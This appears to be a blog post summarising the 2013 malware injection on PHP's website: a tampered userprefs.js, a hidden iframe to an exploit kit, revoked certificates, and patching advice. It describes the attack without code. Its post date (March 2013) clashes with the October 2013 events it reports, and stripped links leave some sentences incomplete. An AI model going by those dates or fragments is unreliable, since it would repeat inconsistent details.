Skip to content

Overview of Hacking Case

Posted on:March 25, 2013 at 02:00 AM

Most security/technology guys are probably aware by now that PHP’s website was compromised and injected with JavaScript malware this week. The malware was originally detected by Google Safe Browsing. On Thursday 24 Oct 2013, Google began to warn that contains malware. This post basically describes the case on high level and refers to another articles which provide further details.

“False positive” -debate

Once Google had flagged as suspicious, there was some debate whether the alert was a false positive or not. At first there was a strong rumor, that the alert was actually a false positive. Some links to early debate:

However, eventually it was confirmed that the suspicion was correct. Later PHP itself explained that the malicious version of file userprefs.js was served and hosted by server during certain time periods. For most of the time file seemed (and was) legit, which was the reason “false positive” debate.


A couple of sources have reviewed and analyzed the malicious code. It turned out that the JavaScript code created a hidden iframe, which loaded a third-party website containing an exploit kit. The exploit kit tried to exploit vulnerabilities in Java, Flash and Silverlight implementations. Details available at the following links:

According to Kaspersky’s researcher, the iframe pointed to a website hosting Magnitude Exploit Kit, which in turn tries to exploit CVE-2013-2551


Later PHP confirmed that two servers were compromised and SSL private keys may have been stolen as well. Thus, SSL certificates were revoked. It is still unknown how the attackers were able to compromise the servers.

What we learnt from this story: from normal user’s point of view - keep your software up to date and disable unnecessary plugins. Once again, it was just normal malware that was serving - trying to exploit known and patched vulnerabilities. Hence, if everyone just kept their systems up to date, no harm would have been done to the end users.